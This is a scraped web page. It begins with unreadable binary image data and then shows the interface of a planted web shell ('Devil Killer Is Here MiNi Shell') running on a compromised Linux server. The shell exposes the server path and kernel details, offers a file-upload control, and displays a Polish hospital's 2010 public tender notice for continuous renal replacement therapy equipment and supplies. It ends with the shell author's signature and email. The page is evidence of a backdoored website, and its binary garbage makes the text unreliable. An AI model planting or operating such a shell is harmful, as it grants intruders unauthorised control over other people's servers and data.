JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100609/161284-N-2010.html

<p class="kh_header"><b>Włocławek: DIZ 9-2010 Zakup płynów do ciągłej terapii nerko zastępczej z miejscową antykoagulacją cytrynianową z modułem Ci- Ca wraz z dzierżawą aparatów -sztuk 2 przez okres 12 miesięcy.</b><br>
<b>Numer ogłoszenia: 161284 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.szpitalwloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ 9-2010 Zakup płynów do ciągłej terapii nerko zastępczej z miejscową antykoagulacją cytrynianową z modułem Ci- Ca wraz z dzierżawą aparatów -sztuk 2 przez okres 12 miesięcy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Aparat do ciągłej terapii nerko zastępczej z miejscową antykoagulacją cytryniano-wą z modułem Ci - Ca - 2 sztuki.

Zadanie 1
Lp.	Opis parametru
	Wymaga-ne
parametry graniczne	Parametry oferowane
( należy opisać)
1. 	HEMOFILTRACJA (CVVH)
	Tak	
2	WOLNA ULTRAFILTRACJA (SCUF)
	Tak	
3	HEMODIALIZA (CVVHD)
	Tak	
4.	HEMODIAFILTRACJA (CVVHDF)
	Tak	
5.	WYSOKOOBJĘTOŚCIOWA HEMOFILTRACJA (HV-HF)
	Tak	
6.	PLAZMAFEREZA (PF)
	Tak	
7.	HEMOPERFUZJA (HP)
	Tak	
8.	KOMUNIKACJA W JĘZYKU POLSKIM NA EKRANIE
	Tak	
9.	ZASILANIE AWARYJNE NA MIN. 15 min.
	Tak	
10.	ZINTEGROWANA POMPA STRZYKAWKA 50 ML
	Tak	
11.	POMOC KONTEKSTOWA
	Tak	
12.	SYSTEM BILANSUJĄCY GRAWIMETRYCZNY
	Tak	
13.	MINIMUM TRZY WAGI: SUBSTYTUTU,
DIALIZATU FILTRATU
	Tak	
14.	DOKŁADNOŚĆ WAŻENIA 1 g
	Tak	
15.	POBÓR SUBSTYTUTU Z 4 WORKÓW PO 5L JEDNOCZEŚNIE

	Tak	
16.	WYDAJNOŚĆ POMPY KRWI DO  500 ml -min.
	Tak	


17.	POMIARY CIŚNIENIA DOSTĘPU POWROTU PRZED HEMOFILTREM FILTRATU	Tak	
18.	ZAKRES CIŚNIENIA PRZED HEMOFILTREM  
0 - 750 mmHg
	Tak	
19.	REGULACJA TEMPERATURY SUBSTYTUTU/DIALIZATU DLA PEŁNEGO ZAKRESU OFEROWANYCH PRZEPŁYWÓW 
(35 - 39)°C



	Tak	







20.	MOŻLIWOŚĆ WYŁĄCZENIA OGRZEWANIA PŁYNÓW
	Tak	
21.	DETEKTOR PRZECIEKU KRWI
	Tak	
22.	DWA NIEZALEŻNE DETEKTORY POWIETRZA
	Tak	
23.	MOŻLIWOŚĆ WYMIANY DRENU ŻYLNEGO W TRAKCIE ZABIEGU
	Tak	
24.	DWIE PULAPKI POWIETRZA PRZED I ZA HEMOFILTREM
	Tak	
25.	NIEZALEŻNIE ODPOWIETRZANIE SUBSTYTUTU, DIALIZATU, FILTRATU 

	Tak	
26.	PRZEPŁYW SUBSTYTUTU DO 160 ml-min.
	Tak	
27	MODUŁ CYTRYNIAN/WAPŃ
	Tak	
28. 	CVVHD Z REGIONALNĄ ANTYKOAG. CYTRYNIANOWĄ
	Tak	
29	SZKOLENIA - MINIMUM 3 OSOBY PERSONELU UŻYTKOWNIKA W ZAKRESIE OBSŁUGI URZĄDZENIA

	Tak	
30 	Autoryzowany serwis gwarancyjny i pogwarancyjny na terenie POLSKI	Tak	
31 	Długość udzielanej gwarancji  minimum 24  podać ilość miesięcy TAK - NIE	Tak	
32 	Gwarancja produkcji części zamiennych [ilość lat] min 8 - podać ilość lat TAK - NIE	Tak	
33 	Sprzęt zastępczy w przypadku awarii trwającej powyżej 10 dni  TAK - NIE	Tak	





Zadanie 2
2.1.1 Materiały jednorazowe - Płyny

Lp.	Opis parametru
	Wymaga-ne
parametry graniczne	Parametry oferowane
( należy opisać)
1. 	1.	Zestawy do ciągłej, żylno-żylnej hemodia-filtracji     składające się z jałowych, zapa-kowanych osobno następujących elementów:
	- hemofiltra z polisulfonową błoną półprze-            puszczalną o powierzchni dyfuzyjnej 1,4 m2
	- kasety integrującej dreny krwi z drenem fil-tracyjnym wraz z akcesoriami do 	 wypeł-niania i płukania układu
	- drenu substytucyjnego, z przyłączami wlo-towymi typu Safe Lock, zbiornikiem pod-grzewacza, zaworem zwrotnym i przyłączem wylotowym typu Luer
 (męski); 
- drenu dializatu, z przyłączami wlotowymi typu Safe Lock, zbiornikiem podgrzewacza, zaworem zwrotnym i przyłączem wyloto-wym typu Hansen
	Tak	
2	Zestawy do ciągłej hemodializy z regionalną antykoagulacją cytrynianową składające się z jałowych, pakowanych osobno następujących elementów:	
- zmodyfikowanej kasety integrującej 5 dre-nów: tętniczy, żylny, filtratu, cytrynianu (z końcówka Safe Lock),  roztworu wapnia (z igłą spike z napowietrzaniem);
- hemofiltra z polisulfonową błoną półprze-puszczalną o pow. dyfuzyjnej 1,8 m2;
- drenu dializatu
	Tak	
3	Worki na filtrat 10L z zaworem spustowym

	Tak	
4.	Strzykawki 50 ml z gumowy tłokiem (kompa-tybilne)
	Tak	
5.	Igły plastikowe typu Spike o długości 72 mm (opakowanie 100 szt.)

	Tak	
6.	Płyn substytucyjny do hemofiltracji (produkt leczniczy)
 

Wodorowęglanowy płyn do hemofiltracji bufo-rowany glukozą w stężeniu fizjologicznym 5,55 mmol- L o różnych stężeniach potasu.
Opakowanie - 4,5 litrowy worek dwukomorowy z wielowarstwowej folii bez PVC, połączenie zawartości komór musi być wykonalne przez ucisk na jedną z nich.
Worek powinien posiadać dwa porty do pobie-rania płynu (wylotowe):
1. typu Luer Lock
2. typu Safe Lock
oraz 
3. port z membraną do nakłucia igłą w celu mo-dyfikacji składu

Skład elektrolitowy:
sód - 140 mmol-L
potas - 0-2-3-4 mmol-L (w zależności od po-trzeb)
wapń 1.5 mmol-L
magnez - 0,5 mmol-L
dwuwęglany - 35 mmol-L
	Tak	
7.	Rozdzielacz 2-4 umożliwiający podłączenie 4 worków płynu do hemofiltracji z jednym drenem substytutu-dializatu
	Tak	
8.	Dwukanałowe silikonowe cewniki do hemofil-tracji o średnicy 11,5-13,5 Fr (do wyboru) w zestawach
z podłączonym w kanale żylnym przeloto-wym mandrynem z końcówkami typu Luer o długościach:	
- 15 cm
- 20 cm
- 24 cm
	Tak	
9.	Dializat (wyrób medyczny) w workach dwu-komorowych 5,0 L o składzie:
sód - 133 mmol-l
potas - 2-4 mmol-l
wapń - 0 mmol-l
magnez - 0,75 mmol-l
dwuwęglany - 20 mmol-l
Worek powinien posiadać dwa porty do pobie-rania płynu (wylotowe):
1. typu Luer Lock
2. typu Safe Lock
oraz 
3. port z membraną do nakłucia igłą w celu mo-dyfikacji składu

	Tak	
10.	4procentCytrynian sodu (wyrób medyczny) w workach 1000   ml z przyłączem Safe-Lock
	Tak	
11.	46,7procentCytrynian sodu do wypełniania kana-łów cewnika w amp.  5 ml dializacyjne-go-centralnego (opak. 20 szt.)
	Tak.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada zarejestrowana działalność gospodarczą w zakresie sprzedaży lub produkcji i sprzedaży artykułów medycznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać , że zrealizował co najmniej 1 dostawę których przedmiotem był podobny sprzęt medyczny.Zamawiający stwierdził to na podstawie dołączonego do ofert wykazu dostaw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złożył stosowne oświadczenie .Zamawiający oceni Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złożył stosowne oświadczenie .Zamawiający oceni Zamawiającego na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada zdolność kredytową lub środki własne w wysokości minimum połowy wartości oferty .Zamawiający oceni Wykonawcę na podstawie stosownego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument potwierdzający , że zaoferowany asortyment jest wpisany ( lub zgłoszony) do Rejestru Wyrobów Medycznych i dopuszczony do obrotu zgodnie z ustawa z dnia 20 kwietnia 2004 r o wyrobach medycznych ( DZ. U. Nr. 93 poz.896 ze zm.)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki
     Dział Inwestycji i Zaopatrzenia
ul. Wieniecka 49 , pokój 303 (biurowiec)
              87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Szpital Wojewódzki
     Dział Inwestycji i Zaopatrzenia
ul. Wieniecka 49 , pokój 303 (biurowiec)
              87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com